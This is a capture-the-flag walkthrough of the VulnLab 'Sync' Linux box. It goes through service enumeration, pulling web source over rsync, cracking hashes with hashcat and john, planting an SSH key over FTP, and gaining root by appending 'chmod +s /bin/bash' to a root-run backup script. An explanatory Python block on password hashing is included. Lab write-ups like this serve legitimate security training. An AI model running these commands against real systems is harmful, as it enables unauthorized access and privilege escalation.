vulnlab-sync

vulnlab sync

An easy Linux box.

nmap scan

# Nmap 7.93 scan initiated Mon Aug 19 11:03:10 2024 as: nmap -A -oN sync.nmap 10.10.93.172
Nmap scan report for 10.10.93.172
Host is up (0.023s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 3.0.5
22/tcp  open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4b1533cc6cce0953f8f37d3b082785fa (ECDSA)
|_  256 18fd36c6a505b196147283f862d53821 (ED25519)
80/tcp  open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Login
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.52 (Ubuntu)
873/tcp open  rsync   (protocol version 31)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 19 11:03:18 2024 -- 1 IP address (1 host up) scanned in 8.51 seconds

rsync enum

rsync -av --list-only rsync://10.10.93.172/

Using rsync to pull the website's source files:

rsync -av rsync://10.10.93.172:873/httpd ./rsyn_shared


Found that the hash is built from three parts, $secure|$username|$password, where the secure hash acts as the salt:

a0de4d7f81676c3ea9eabcadfd2536f6:6c4972f3717a5e881e282ad3105de01e|triss|

hashcat can crack this one (mode 20, md5($salt.$pass)):

hashcat -a 0 -m 20 hash.txt /usr/share/wordlists/rockyou.txt -o crackedtriss.txt
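To make the weakness concrete, here is an added example (not code from the box or from vulnlab) that reproduces the stored-hash layout implied by the -m 20 line, md5(secure|username|password), and places a hardened replacement next to it. The secure value and password below are constructed, not the box's real secret.

```python
import hashlib
import hmac
import os

SEP = "|"

def legacy_hash(secure: str, username: str, password: str) -> str:
    """Stored value as inferred from hashcat -m 20: md5(secure|username|password).
    A single fast MD5 over a static salt is why a rockyou run finishes quickly."""
    salt = f"{secure}{SEP}{username}{SEP}"
    return hashlib.md5((salt + password).encode()).hexdigest()

def legacy_hashcat_line(secure: str, username: str, stored_hex: str) -> str:
    """The hash:salt line layout hashcat -m 20 expects, as seen on the page."""
    return f"{stored_hex}:{secure}{SEP}{username}{SEP}"

def legacy_verify(secure: str, username: str, password: str, stored_hex: str) -> bool:
    return hmac.compare_digest(legacy_hash(secure, username, password), stored_hex)

# Hardened replacement: random per-user salt, slow KDF, constant-time compare.
ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor (assumption: OWASP-level)

def hardened_hash(password: str, salt: bytes = b"") -> tuple:
    """Return (salt, digest); a fresh 16-byte salt is drawn when none is given."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def hardened_verify(password: str, salt: bytes, digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)

if __name__ == "__main__":
    # Constructed sample values only.
    secure = "0123456789abcdef0123456789abcdef"
    h = legacy_hash(secure, "triss", "example-password")
    print(legacy_hashcat_line(secure, "triss", h))
    salt, digest = hardened_hash("example-password")
    print(hardened_verify("example-password", salt, digest))
```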

We can now FTP to the box as triss, make a .ssh folder, and upload our authorized_keys file (id_rsa.pub) there:

┌──(puck㉿kali)-[~/vulnlab/sync]
└─$ ftp 10.10.93.172      
Connected to 10.10.93.172.
220 (vsFTPd 3.0.5)
Name (10.10.93.172:puck): triss
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||41121|)
150 Here comes the directory listing.
drwxr-x---    2 1003     1003         4096 Apr 21  2023 .
drwxr-x---    2 1003     1003         4096 Apr 21  2023 ..
lrwxrwxrwx    1 0        0               9 Apr 21  2023 .bash_history -> /dev/null
-rw-r--r--    1 1003     1003          220 Apr 19  2023 .bash_logout
-rw-r--r--    1 1003     1003         3771 Apr 19  2023 .bashrc
-rw-r--r--    1 1003     1003          807 Apr 19  2023 .profile
226 Directory send OK.
ftp> mkdir .ssh
257 "/.ssh" created
ftp> cd .ssh
250 Directory successfully changed.
ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||6569|)
150 Ok to send data.
100% |************************************************************************|    91      612.87 KiB/s    00:00 ETA
226 Transfer complete.
91 bytes sent in 00:00 (2.32 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||65353|)
150 Here comes the directory listing.
-rw-------    1 1003     1003           91 Aug 19 09:11 authorized_keys
226 Directory send OK.


ssh -i ed_25519 triss@10.10.93.172

Found another user, jennifer, in /etc/passwd; su jennifer works with the same password as triss.

There is a zip file in the /backup directory, a backup owned by root.

timeout 60s ./pspy64

Getting the zip:

wget http://10.8.2.138:8000/1698154321.zip

unshadow

unshadow passwd shadow > unshadow

Crack it with john:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt unshadow

User sa has write permission on this shell script, which is the backup job root runs:

echo "chmod +s /bin/bash" >> /usr/local/bin/backup.sh
cat /usr/local/bin/backup.sh
#!/bin/bash

mkdir -p /tmp/backup
cp -r /opt/httpd /tmp/backup
cp /etc/passwd /tmp/backup
cp /etc/shadow /tmp/backup
cp /etc/rsyncd.conf /tmp/backup
zip -r /backup/$(date +%s).zip /tmp/backup
rm -rf /tmp/backup
chmod +s /bin/bash

Wait a minute for the backup script to run again, then:

/bin/bash -p
bash-5.1# id
uid=1001(sa) gid=1001(sa) euid=0(root) egid=0(root) groups=0(root),1001(sa)
bash-5.1#

that’s all
